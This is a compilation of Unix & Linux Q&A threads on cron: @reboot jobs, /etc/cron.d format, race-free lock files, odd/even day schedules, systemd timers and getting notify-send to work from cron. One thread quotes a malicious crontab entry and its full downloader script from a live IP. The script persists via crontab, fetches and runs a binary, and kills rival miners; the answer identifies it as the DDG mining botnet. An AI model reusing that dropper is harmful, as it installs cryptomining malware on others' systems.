man 5 crontab is pretty clear on how to use crontab to run a script on boot:
These special time specification "nicknames" are supported, which replace the 5 initial time and date
fields, and are prefixed by the `@` character:
@reboot : Run once after reboot.
So I happily added a single line to my crontab (under my user account, not root):
@reboot /home/me/myscript.sh
But for some reason, myscript.sh wouldn't run on machine reboot.
(it runs fine if I invoke it from the command line, so it's not a permissions problem)
What am I missing?
Update to answer @Anthon's questions:
Oracle-linux version: 5.8 (uname: 2.6.32-300.39.2.el5uek #1 SMP)
Cron version: vixie-cron-4.1-81.el5.x86_64
Yes, /home is a mounted partition. Looks like this is the problem. How do I workaround this?
Currently, myscript.sh only echos a text message to a file in /home/me.
|
This can be a bit of a confusing topic because there are different implementations of cron. There were also several bugs that broke this feature, and there are some use cases where it simply won't work, specifically if you do a shutdown/boot vs. a reboot.
Bugs
datapoint #1
One such bug in Debian is covered here, titled: cron: @reboot jobs are not run. This seems to have made its way into Ubuntu as well, which I can't confirm directly.
datapoint #2
Evidence of the bug in Ubuntu would seem to be confirmed here in this SO Q&A titled: @reboot cronjob not executing.
excerpt
comment #1: .... 3) your version of crond may not support @reboot are you using vix's crond? ... show results of crontab -l -u user
comment #2: ... It might be a good idea to set it up as an init script instead of relying on a specific version of cron's @reboot.
comment #3: ... @MarkRoberts removed the reboot and modified the 1 * * * * , to */1 * * * * , problem is solved! Where do I send the rep pts Mark? Thank you!
The accepted answer in that Q&A also had this comment:
Seems to me Lubuntu doesn't support the @Reboot Cron syntax.
Additional evidence
datapoint #3
As additional evidence, there was this thread in which someone was attempting the very same thing and getting frustrated that it didn't work. It's titled: Thread: Cron - @reboot jobs not working.
excerpt
Re: Cron - @reboot jobs not working
Quote Originally Posted by ceallred View Post
This is killing me... Tried the wrapper script. Running manually generates the log file... rebooting and the job doesn't run or create log file.
Syslog shows that CRON ran the job... but again, no output and the process isn't running.
Jul 15 20:07:45 RavenWing cron[1026]: (CRON) INFO (Running @reboot jobs)
Jul 15 20:07:45 RavenWing CRON[1053]: (ceallred) CMD (/home/ceallred/Scripts/run_spideroak.sh > /home/ceallred/Scripts/SpiderOak.log 2>&1 &)
It's seems like cron doesn't like the @reboot command.... Any other ideas?
Okay... Partially solved. I'll mark this one as solved and start a new thread with the new issue.....
I think the answer was my encrypted home directory wasn't mounted when CRON was trying to run the script (stored in /home/username/scripts). Moved to /usr/scripts and the job runs as expected.
So now it appears to be a spideroak issue. Process starts, but by the time the boot process is finished, it's gone. I'm guessing a crash for some reason.... New thread to ask about that.
Thanks for all the help!
Once the above user figured out his issue, he was able to get @reboot working from a user's crontab entry.
I'm not entirely sure what version of cron is used on Ubuntu, but this would seem to indicate that users can use @reboot too, or that the bug was fixed at some point in subsequent versions of cron.
datapoint #4
I tested the following on CentOS 6 and it worked.
Example
$ crontab -l
@reboot echo "hi" > /home/sam/reboot.txt 2>&1
I then rebooted the system.
$ sudo reboot
After the reboot.
$ cat reboot.txt
hi
Take aways
This feature does seem to be supported for both system and user crontab entries.
You have to make sure that it's supported/working in your particular distro and/or version of the cron package.
For more on how the actual mechanism works for @reboot I did come across this blog post which discusses the innards. It's titled: @reboot - explaining simple cron magic.
Debugging crond
You can turn up the verbosity of crond by adding the following to the /etc/sysconfig/crond configuration file on RHEL/CentOS/Fedora-based distros.
$ more crond
# Settings for the CRON daemon.
# CRONDARGS= : any extra command-line startup arguments for crond
CRONDARGS="-L 2"
The valid levels are 0, 1, or 2. To revert this file back to its default logging level, simply remove the "-L 2" when you're done debugging the situation.
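With logging turned up, a quick way to confirm after a reboot whether the @reboot jobs actually fired is to search the cron log (the path shown is the RHEL/CentOS default; exact message wording varies by cron version):

```shell
# Did cron attempt the @reboot jobs on the last boot?
grep -i '@reboot' /var/log/cron | tail -n 5
```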
| crontab's @reboot only works for root? |
Here's what I did on Debian Jessie:
install cron via apt-get install cron
put a backup_crontab file in /etc/cron.d/
However the task is never running.
Here are some outputs:
/# crontab -l
no crontab for root
/# cd /etc/cron.d && ls
backup_crontab
/etc/cron.d# cat backup_crontab
0,15,30,45 * * * * /backup.sh >/dev/null 2>&1
Is there something to do to activate a particular crontab, or to activate the cron "service" in itself?
|
Files in /etc/cron.d need to also list the user that the job is to be run under.
i.e.
0,15,30,45 * * * * root /backup.sh >/dev/null 2>&1
You should also ensure the permissions and owner:group are set correctly (-rw-r--r-- and owned by root:root)
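For comparison, the same job in both formats (paths as in the question):

```
# User crontab (crontab -e) - five time fields, then the command:
0,15,30,45 * * * * /backup.sh >/dev/null 2>&1

# /etc/cron.d/backup_crontab - a sixth field names the user:
0,15,30,45 * * * * root /backup.sh >/dev/null 2>&1
```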
| Crontab never running while in /etc/cron.d |
Sometimes you have to make sure that only one instance of a shell script is running at the same time.
For example a cron job which is executed via crond that does not provide
locking on its own (e.g. the default Solaris crond).
A common pattern to implement locking is code like this:
#!/bin/sh
LOCK=/var/tmp/mylock
if [ -f $LOCK ]; then # 'test' -> race begin
echo Job is already running\!
exit 6
fi
touch $LOCK # 'set' -> race end
# do some work
rm $LOCK
Of course, such code has a race condition. There is a time window in which two
instances can both advance past the test on line 3 before either is able to
touch the $LOCK file.
For a cron job this is usually not a problem because you have an interval of
minutes between two invocations.
But things can go wrong - for example, when the lockfile is on an NFS server
that hangs. In that case several cron jobs can block on line 3 and queue up. If
the NFS server becomes active again, you have a thundering herd of parallel
running jobs.
Searching on the web I found the tool lockrun which seems like a good
solution to that problem. With it you run a script that needs locking like
this:
$ lockrun --lockfile=/var/tmp/mylock myscript.sh
You can put this in a wrapper or use it from your crontab.
It uses lockf() (POSIX) if available and falls back to flock() (BSD). And lockf() support over NFS should be relatively widespread.
Are there alternatives to lockrun?
What about other cron daemons? Are there common cron daemons that support locking in a
sane way? A quick look into the man page of Vixie cron (the default on
Debian/Ubuntu systems) does not show anything about locking.
Would it be a good idea to include a tool like lockrun into coreutils?
In my opinion it implements a theme very similar to timeout, nice and friends.
|
Here's another way to do locking in a shell script that can prevent the race condition you describe above, where two jobs may both pass line 3. The noclobber option will work in ksh and bash. Don't use set noclobber because you shouldn't be scripting in csh/tcsh. ;)
lockfile=/var/tmp/mylock
if ( set -o noclobber; echo "$$" > "$lockfile") 2> /dev/null; then
trap 'rm -f "$lockfile"; exit $?' INT TERM EXIT
# do stuff here
# clean up after yourself, and release your trap
rm -f "$lockfile"
trap - INT TERM EXIT
else
echo "Lock Exists: $lockfile owned by $(cat $lockfile)"
fi
YMMV with locking on NFS (you know, when NFS servers are not reachable), but in general it's much more robust than it used to be. (10 years ago)
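What makes this safe is that with noclobber set, the > redirection fails when the file already exists, so the existence test and the creation collapse into a single atomic step. A minimal self-contained sketch of that behavior (the lock path and function name are illustrative; `set -C` is the POSIX spelling of noclobber):

```shell
#!/bin/sh
# Try to create the lockfile atomically; succeed only if it did not exist.
acquire() {
    ( set -C; echo "$$" > "$1" ) 2>/dev/null
}

lockfile=/tmp/mylock.demo.$$

if acquire "$lockfile"; then
    echo "lock acquired"
fi

# A second attempt while the file exists must fail:
if acquire "$lockfile"; then
    echo "double acquire - locking is broken"
else
    echo "lock already held by $(cat "$lockfile")"
fi

rm -f "$lockfile"
```

Because the check-and-create happens in one redirection, there is no window for a second process to slip in between the test and the write.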
If you have cron jobs that do the same thing at the same time, from multiple servers, but you only need 1 instance to actually run, then something like this might work for you.
I have no experience with lockrun, but having a pre-set lock environment prior to the script actually running might help. Or it might not. You're just setting the test for the lockfile outside your script in a wrapper, and theoretically, couldn't you just hit the same race condition if two jobs were called by lockrun at exactly the same time, just as with the 'inside-the-script' solution?
File locking is pretty much honor-system behavior anyway, and any scripts that don't check for the lockfile's existence prior to running will do whatever they're going to do. Just by putting in the lockfile test, and proper behavior, you'll be solving 99% of potential problems, if not 100%.
If you run into lockfile race conditions a lot, it may be an indicator of a larger problem, like not having your jobs timed right, or perhaps if interval is not as important as the job completing, maybe your job is better suited to be daemonized.
EDIT BELOW - 2016-05-06 (if you're using KSH88)
Based on @Clint Pachl's comment below, if you use ksh88, use mkdir instead of noclobber. This mostly mitigates a potential race condition, but doesn't entirely eliminate it (though the risk is minuscule). For more information read the link that Clint posted below.
lockdir=/var/tmp/mylock
pidfile=/var/tmp/mylock/pid
if ( mkdir ${lockdir} ) 2> /dev/null; then
echo $$ > $pidfile
trap 'rm -rf "$lockdir"; exit $?' INT TERM EXIT
# do stuff here
# clean up after yourself, and release your trap
rm -rf "$lockdir"
trap - INT TERM EXIT
else
echo "Lock Exists: $lockdir owned by $(cat $pidfile)"
fi
And, as an added advantage, if you need to create tmpfiles in your script, you can use the lockdir directory for them, knowing they will be cleaned up when the script exits.
For more modern bash, the noclobber method at the top should be suitable.
| Correct locking in shell scripts? |
When configuring cron to run a command every other day using the "Day of Month" field, like so:
1 22 */2 * * COMMAND
it runs every time the day of month is odd: 1,3,5,7,9 and so on.
How can I configure cron to run on days of month that are even like 2,6,8,10 and so on (without specifying it literally, which is problematic as every month has a different number of days in the month)?
|
The syntax you tried is actually ambiguous. Depending on how many days are in the month, some months it will run on odd days and some on even. This is because the way it is calculated takes the total number of possibilities and divides them up. You can override this strange-ish behavior by manually specifying the day range and using either an odd or even number of days. Since even-day scripts would never run on the 31st day of longer months, you don't lose anything using 30 days as the base for even days, and by explicitly dividing it up as if there were 31 days you can force odd-day execution.
The syntax would look like this:
# Will only run on odd days:
0 0 1-31/2 * * command
# Will only run on even days:
0 0 2-30/2 * * command
Your concern about months not having the same number of days is not important here because no months have MORE days than this, and for poor February, the date range just won't ever match the last day or two, but it will do no harm having it listed.
The only 'gotcha' for this approach is that if you are on an odd day cycle, following months with 31 days your command will also run on the first of the month. Likewise if you are forcing an even cycle, each leap year will cause one three-day cycle at the end of February. You cannot really get around the fact that any regular pattern of "every other day" is not always going to fall on even or odd days in every month and any way you force this you will either have an extra run or be missing a run between months with mismatched day counts.
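If you need a strict every-other-day cadence that survives month boundaries, a common workaround (not part of the approach above) is to run the job daily and test the parity of the epoch day count inside the command itself. Note that % is special in crontab entries and must be escaped:

```
# Run at midnight only on even-numbered days since the epoch:
0 0 * * * [ $(( $(date +\%s) / 86400 \% 2 )) -eq 0 ] && command
```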
| How can I tell cron to run a command every other day (odd/even) |
First of all I'm using CentOS
[root@a etc]# cat system-release
CentOS release 6.5 (Final)
[root@a cron.daily]# ps -ef | grep cron
root 982 1 0 Jun14 ? 00:01:15 crond
root 5692 5441 0 00:49 pts/0 00:00:00 grep cron
[root@a cron.daily]#
And I'm running out of disk space, so I want to delete the old log files. In this case I would like to delete the old secure logs, which are more than 100 MB in size, so I added the crontab entry below for the root user.
[root@a etc]# crontab -l
0 1 * * * find /var/log -name "secure-*" -mtime +5 -exec rm {} \;
[root@a etc]#
A few days later I found that this crontab entry doesn't work, and I still see the old files.
[root@a log]# find /var/log -name "secure-*"
/var/log/secure-20141214
/var/log/secure-20141107
/var/log/secure-20141130
/var/log/secure-20141221
[root@a log]#
Later I tried to search for the crontab logs under the /etc/cron.daily directory and found no relevant results. Where can I find the crontab logs, and how can I tell whether the crontab is running successfully or not?
|
Cron logs on CentOS 6 are located in /var/log/cron by default. This only logs the execution of commands, not the results or exit statuses. The output of the executed command goes to the user's mail by default (root's mail in this case). An alternate email can be specified by the MAILTO variable inside of the crontab.
You should look at adjusting the logrotate rules instead of using a custom cron job; logrotate already handles the deletion of the /var/log/secure logs.
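For example, you can have cron mail the job's output so failures become visible, and check the log for execution times (the address is illustrative):

```
# crontab -e (root): have cron mail the job's output
MAILTO=admin@example.com
0 1 * * * find /var/log -name "secure-*" -mtime +5 -exec rm {} \;

# then confirm execution times on the shell:
#   grep CROND /var/log/cron
```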
| Where to find the Crontab logs in CentOS |
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.
Crontab entry:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
The contents of http://103.219.112.66:8000/i.sh are:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.
What is this? What should I do?
|
It is a DDG mining botnet. How it works:
exploiting an RCE vulnerability
modifying the crontab
downloading the appropriate mining program (written with go)
starting the mining process
DDG: A Mining Botnet Aiming at Database Servers
SystemdMiner when a botnet borrows another botnet’s infrastructure
U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
| Suspicious crontab entry running 'xribfa4' every 15 minutes |
I am currently trying to understand the difference between init.d and cron @reboot for running a script at startup/booting of the system.
The use of @reboot (this method was mentioned in this forum by hs.chandra) is somewhat simpler: by going into crontab -e and creating an entry @reboot /some_directory/to_your/script/your_script.txt, your_script.txt shall be executed every time the system is rebooted. An in-depth explanation of @reboot is here
Alternatively by embedding /etc/init.d/your_script.txt into the second line of your script ie:
#!/bin/bash
# /etc/init.d/your_script.txt
You can run chmod +x /etc/init.d/your_script.txt and that should also cause your_script.txt to run every time the system is booted.
What are the key differences between the two?
Which is more robust?
Is there a better one out of the two?
Is this the correct way of embedding a script to run during booting?
I will be incorporating a bash .sh file to run during startup.
|
init.d scripts, also known as SysV scripts, are meant to start and stop services during system initialization and shutdown. (/etc/init.d/ scripts are also run on systemd-enabled systems for compatibility.)
The script is executed during boot and shutdown (by default).
The script should be a proper init.d script, not just any script. It should support start and stop and more (see the Debian policy).
The script can be executed during the system boot (you can define when).
crontab (and therefore @reboot).
cron will execute any regular command or script, nothing special here.
any user can add a @reboot script (not just root)
on a Debian system with systemd: cron's @reboot is executed during multi-user.target.
on a Debian system with SysV (not systemd), crontab(5) mentions: Please note that startup, as far as @reboot is concerned, is the time when the cron(8) daemon startup. In particular, it may be before some system daemons, or other facilities, were startup. This is due to the boot order sequence of the machine.
it's easy to schedule the same script at boot and periodically.
/etc/rc.local is often considered to be ugly or deprecated (at least by Red Hat); still, it has some nice features:
rc.local will execute any regular command or script, nothing special here.
on a Debian system with SysV (not systemd): rc.local was (almost) the last service to start.
but on a Debian system with systemd: rc.local is executed after network.target by default (not network-online.target !)
Regarding systemd's network.target and network-online.target, read Running Services After the Network is up.
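To make the "should support start and stop" point concrete, here is a minimal SysV-style skeleton of the kind of script the answer describes (names and the LSB header values are illustrative; a real Debian init script would usually also source /lib/lsb/init-functions):

```shell
#!/bin/sh
### BEGIN INIT INFO
# Provides:          your_script
# Required-Start:    $remote_fs $syslog
# Required-Stop:     $remote_fs $syslog
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Example service skeleton
### END INIT INFO

start() { echo "Starting your_script"; }
stop()  { echo "Stopping your_script"; }

case "${1:-}" in
    start)   start ;;
    stop)    stop ;;
    restart) stop; start ;;
    "")      : ;;    # invoked without arguments: do nothing
    *)       echo "Usage: $0 {start|stop|restart}" >&2; exit 2 ;;
esac
```

A crontab @reboot entry, by contrast, needs none of this scaffolding: it runs the command once at cron startup and offers no stop/restart handling.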
| Running a script during booting/startup; init.d vs cron @reboot |
I'm using CentOS 7. My aim is to create a cron job that runs every five seconds, but from my research cron only supports a granularity of one minute, so what I have done is create a shell file.
hit.sh
while sleep 5; do curl http://localhost/test.php; done
but so far I have been running it manually by right-clicking it.
What I want is to create a service for that file so that i can start and stop it automatically.
I found the script to create a service
#!/bin/bash
# chkconfig: 2345 20 80
# description: Description comes here....
# Source function library.
. /etc/init.d/functions
start() {
# code to start app comes here
# example: daemon program_name &
}
stop() {
# code to stop app comes here
# example: killproc program_name
}
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
stop
start
;;
status)
# code to check status of app comes here
# example: status program_name
;;
*)
echo "Usage: $0 {start|stop|status|restart}"
esac
exit 0
But I don't know what to write in the start or stop methods. I tried placing the content of hit.sh in start() {} but it gave an error for the } in the stop method.
|
Users trying to run a script as a daemon on a modern system should be using systemd:
[Unit]
Description=hit service
After=network-online.target
[Service]
ExecStart=/path/to/hit.sh
[Install]
WantedBy=multi-user.target
Save this as /etc/systemd/system/hit.service, and then you will be able to start/stop/enable/disable it with systemctl start hit, etc.
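After saving the unit file, the usual activation sequence is:

```
sudo systemctl daemon-reload              # pick up the new unit file
sudo systemctl enable --now hit.service   # start it now and at every boot
systemctl status hit.service              # verify it is running
```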
Old answer from 2015:
If you'd like to reuse your code sample, it could look something like:
#!/bin/bash
case "$1" in
start)
/path/to/hit.sh &
echo $!>/var/run/hit.pid
;;
stop)
kill `cat /var/run/hit.pid`
rm /var/run/hit.pid
;;
restart)
$0 stop
$0 start
;;
status)
if [ -e /var/run/hit.pid ]; then
echo hit.sh is running, pid=`cat /var/run/hit.pid`
else
echo hit.sh is NOT running
exit 1
fi
;;
*)
echo "Usage: $0 {start|stop|status|restart}"
esac
exit 0
Naturally, the script you want to be executed as a service should go to e.g. /usr/local/bin/hit.sh, and the above code should go to /etc/init.d/hitservice.
For each runlevel which needs this service running, you will need to create a respective symlink. For example, a symlink named /etc/rc5.d/S99hitservice will start the service for runlevel 5. Of course, you can still start and stop it manually via service hitservice start/service hitservice stop
| How do I create a service for a shell script so I can start and stop it like a daemon? |
I want to use systemd to run a command every 5 minutes. However, there is a risk that occasionally the task may take longer than 5 minutes to run. At that point, will systemd start a second instance of the command i.e. will I end up with 2 processes running?
Is it possible to tell systemd not to start a second process if the first hasn't completed? If not, what are some good workarounds?
Note: I hope the answer is "That's the default behavior. It just isn't documented." If this is the situation, can someone tell me how to file a bug against their docs?
Note: Cron has a similar issue which is discussed in https://unix.stackexchange.com/a/173928/11244. I'm looking for the systemd equivalent.
|
This is the default (and the only) behavior. It is not explicitly documented, but is implied by systemd's operation logic.
systemd.timer(5) reads:
For each timer file, a matching unit file must exist, describing the unit to activate when the timer elapses.
systemd(1), in turn, describes the concept of unit states and transitions between them:
Units may be "active" (meaning started, bound, plugged in, ..., depending on the unit type, see below), or "inactive" (meaning stopped, unbound, unplugged, ...), as well as in the process of being activated or deactivated, i.e. between the two states (these states are called "activating", "deactivating").
This means that the triggering of a timer leads to "activation" of the matching unit, i. e. its transition to the "active" state.
If the matching unit is already "active" at the time of "activation" (for a service unit, this means "the main process is still running", unless the service unit has Type=oneshot and RemainAfterExit=true), it should be obvious that no action will be taken.
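As a concrete sketch, a timer/service pair for the 5-minute case could look like this (unit names and the script path are illustrative). Because the timer merely activates mytask.service, a trigger that elapses while the service's main process is still running takes no action:

```
# /etc/systemd/system/mytask.timer
[Unit]
Description=Run mytask every 5 minutes

[Timer]
OnCalendar=*:0/5

[Install]
WantedBy=timers.target

# /etc/systemd/system/mytask.service
[Unit]
Description=mytask job

[Service]
ExecStart=/usr/local/bin/mytask
```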
| Does systemd timer unit skip the next run if the process hasn't finished yet? |
How are files under /etc/cron.d used?
From https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
cron reads the files in /etc/cron.d/ directory. Usually system daemon
such as sa-update or sysstat places their cronjob here. As a root user
or superuser you can use following directories to configure cron jobs.
You can directly drop your scripts here. The run-parts command run
scripts or programs in a directory via /etc/crontab file:
/etc/cron.d/ Put all scripts here and call them from /etc/crontab
file.
On Lubuntu 18.04, the files under /etc/cron.d seem to be crontab files not shell scripts (which was mentioned in the above link):
$ cat /etc/cron.d/anacron
# /etc/cron.d/anacron: crontab entries for the anacron package
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
30 7 * * * root [ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi
My /etc/crontab file never refers to files under/etc/cron.d, contrary to what the link says:
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
Could you explain how the files under /etc/cron.d are used? Thanks.
|
In Debian derivatives, including Lubuntu, the files in /etc/cron.d are effectively /etc/crontab snippets, with the same format. Quoting the cron manpage:
Additionally, in Debian, cron reads the files in the /etc/cron.d directory. cron treats the files in /etc/cron.d as in the same way as the /etc/crontab file (they follow the special format of that file, i.e. they include the user field). However, they are independent of /etc/crontab: they do not, for example, inherit environment variable settings from it. This change is specific to Debian see the note under DEBIAN SPECIFIC below.
Like /etc/crontab, the files in the /etc/cron.d directory are monitored for changes. In general, the system administrator should not use /etc/cron.d/, but use the standard system crontab /etc/crontab.
The Debian-specific section hints at the reason system administrators shouldn’t use /etc/cron.d:
Support for /etc/cron.d (drop-in dir for package crontabs)
It’s designed to allow packages to install crontab snippets without having to modify /etc/crontab.
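For instance, a package might ship a file like this (contents illustrative), which cron picks up automatically without anything having to modify /etc/crontab:

```
# /etc/cron.d/mypackage
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 3 * * * root /usr/lib/mypackage/cleanup
```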
| How are files under /etc/cron.d used? |
What is the main difference between the directory cron.d (as in /etc/cron.d/) and crontab?
As far as I understand, one could create a file like /etc/cron.d/my_non_crontab_cronjobs and put whatever one wants inside it, just as one would put them in crontab via crontab -e.
So what is the main difference between the two?
|
The differences are documented in detail in the cron(8) manpage in Debian. The main difference is that /etc/cron.d is populated with separate files, whereas crontab manages one file per user; it’s thus easier to manage the contents of /etc/cron.d using scripts (for automated installation and updates), and easier to manage crontab using an editor (for end users really).
Other important differences are that not all distributions support /etc/cron.d, and that the files in /etc/cron.d have to meet a certain number of requirements (beyond being valid cron jobs): they must be owned by root, and must conform to run-parts’ naming conventions (no dots, only letters, digits, underscores, and hyphens).
If you’re considering using /etc/cron.d, it’s usually worth considering one of /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, or /etc/cron.monthly instead.
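The naming requirement matters in practice: a file whose name doesn't match the run-parts conventions is silently ignored (filenames below are illustrative):

```
/etc/cron.d/backup-job    # valid: letters, digits, hyphens, underscores only
/etc/cron.d/backup.sh     # ignored: contains a dot
```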
| What is the difference between cron.d (as in /etc/cron.d/) and crontab? |
I have seen a crontab record on a system.
0-55/5 * * * * root <command>
I read the crontab -e example files and I know the first position stands for minute. But I cannot figure out the meaning of / (slash) there. Could anyone explain the meaning to me?
|
The forward slash is used in conjunction with ranges to specify step values.
0-55/5 * * * * means your command will be executed every five minutes (0, 5, 10, 15, ..., 55).
0-55/5 is the same as */5.
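A few more step-value examples in the minute and day-of-month fields:

```
*/10     # every 10 minutes: 0,10,20,30,40,50
5-35/10  # every 10 minutes within a range: 5,15,25,35
1-31/2   # every other day of month, starting at 1 (odd days)
```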
| What's the meaning of the slash in crontab? |
I'm wondering who starts unattended-upgrades on my Debian Jessie system.
My man page says:
DESCRIPTION
This program can download and install security upgrades automatically
and unattended, taking care to only install packages from the config‐
ured APT source, and checking for dpkg prompts about configuration file
changes. All output is logged to /var/log/unattended-upgrades.log.
This script is the backend for the APT::Periodic::Unattended-Upgrade
option and designed to be run from cron (e.g. via /etc/cron.daily/apt).
But my crontab doesn't show anything by crontab command:
@stefano:/etc/cron.daily$ crontab -l
no crontab for stefano
# crontab -l
no crontab for root
But my unattended-upgrades works fine! (From my unattended-upgrades log file):
2017-02-05 12:42:42,835 INFO Initial blacklisted packages:
2017-02-05 12:42:42,866 INFO Initial whitelisted packages:
2017-02-05 12:42:42,868 INFO Starting unattended upgrades script
2017-02-05 12:42:42,870 INFO Allowed origins are: ['o=Debian,n=jessie', 'o=Debian,n=jessie-updates', 'o=Debian,n=jessie-backports', 'origin=Debian,codename=jessie,label=Debian-Security']
2017-02-05 12:43:15,848 INFO No packages found that can be upgraded unattended
Where do I have to check/modify if I want to change my schedule?
|
Where do I have to check/modify if I want to change my schedule?
unattended-upgrades is configured to run automatically.
To verify, check the /etc/apt/apt.conf.d/20auto-upgrades file; you will see:
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";
To modify it, run the following command:
dpkg-reconfigure -plow unattended-upgrades
sample output:
Applying updates on a frequent basis is an important part of keeping
systems secure. By default, updates need to be applied manually using
package management tools.
Alternatively, you can choose to have this system automatically download
and install security updates.
Automatically download and install stable updates?
Choose No to stop the auto-update.
Verify /etc/apt/apt.conf.d/20auto-upgrades again; you should see:
APT::Periodic::Update-Package-Lists "0";
APT::Periodic::Unattended-Upgrade "0";
Edit
To run unattended-upgrades weekly, edit your /etc/apt/apt.conf.d/20auto-upgrades as follows:
APT::Periodic::Update-Package-Lists "7";
APT::Periodic::Unattended-Upgrade "1";
A detailed example can be found on Debian-Wiki : automatic call via /etc/apt/apt.conf.d/02periodic
APT::Periodic::Update-Package-Lists
This option allows you to specify the frequency (in days) at which the package lists are refreshed. apticron users can do without this variable, since apticron already does this task.
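To inspect the effective values without opening the files, apt-config can dump the merged configuration:

```
apt-config dump | grep Periodic
```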
| How is unattended-upgrades started and how can I modify its schedule? |
I am using Arch Linux with KDE/Awesome WM. I am trying to get
notify-send to work with cron.
I have tried setting DISPLAY/XAUTHORITY variables, and running notify-send with "sudo -u", all without result.
I am able to call notify-send interactively from the session and get notifications.
FWIW, the cron job is running fine which I verified by echoing stuff to a temporary file. It is just the "notify-send" that fails to work.
Code:
[matrix@morpheus ~]$ crontab -l
* * * * * /home/matrix/scripts/notify.sh
[matrix@morpheus ~]$ cat /home/matrix/scripts/notify.sh
#!/bin/bash
export DISPLAY=127.0.0.1:0.0
export XAUTHORITY=/home/matrix/.Xauthority
echo "testing cron" >/tmp/crontest
sudo -u matrix /usr/bin/notify-send "hello"
echo "now tested notify-send" >>/tmp/crontest
[matrix@morpheus ~]$ cat /tmp/crontest
testing cron
now tested notify-send
[matrix@morpheus ~]$
As you can see the echo before & after notify-send worked.
Also I have tried setting DISPLAY=:0.0
UPDATE:
I searched a bit more and found that DBUS_SESSION_BUS_ADDRESS needs to be set. And after hardcoding this using the value I got from my interactive session, the tiny little "hello" message started popping up on the screen every minute!
But the catch is that this variable is not permanent per that post, so I'll have to try the named pipe solution suggested there.
[matrix@morpheus ~]$ cat scripts/notify.sh
#!/bin/bash
export DISPLAY=127.0.0.1:0.0
export XAUTHORITY=/home/matrix/.Xauthority
export DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-BouFPQKgqg,guid=64b483d7678f2196e780849752e67d3c
echo "testing cron" >/tmp/crontest
/usr/bin/notify-send "hello"
echo "now tested notify-send" >>/tmp/crontest
Since cron doesn't seem to support notify-send (at least not directly) is there some other notification system that is more cron friendly that I can use?
|
You need to set the DBUS_SESSION_BUS_ADDRESS variable. By default cron does
not have access to the variable. To remedy this put the following script
somewhere and call it when the user logs in, for example using awesome and
the run_once function mentioned on the wiki. Any method will do, since it
does no harm to call the function more often than required.
#!/bin/sh
# create ~/.dbus if it does not exist yet, then (re)write the Xdbus file
mkdir -p "$HOME/.dbus"
touch "$HOME/.dbus/Xdbus"
chmod 600 "$HOME/.dbus/Xdbus"
env | grep DBUS_SESSION_BUS_ADDRESS > "$HOME/.dbus/Xdbus"
echo 'export DBUS_SESSION_BUS_ADDRESS' >> "$HOME/.dbus/Xdbus"
exit 0
This creates a file containing the required D-Bus environment variable. Then in
the script called by cron you import the variable by sourcing the script:
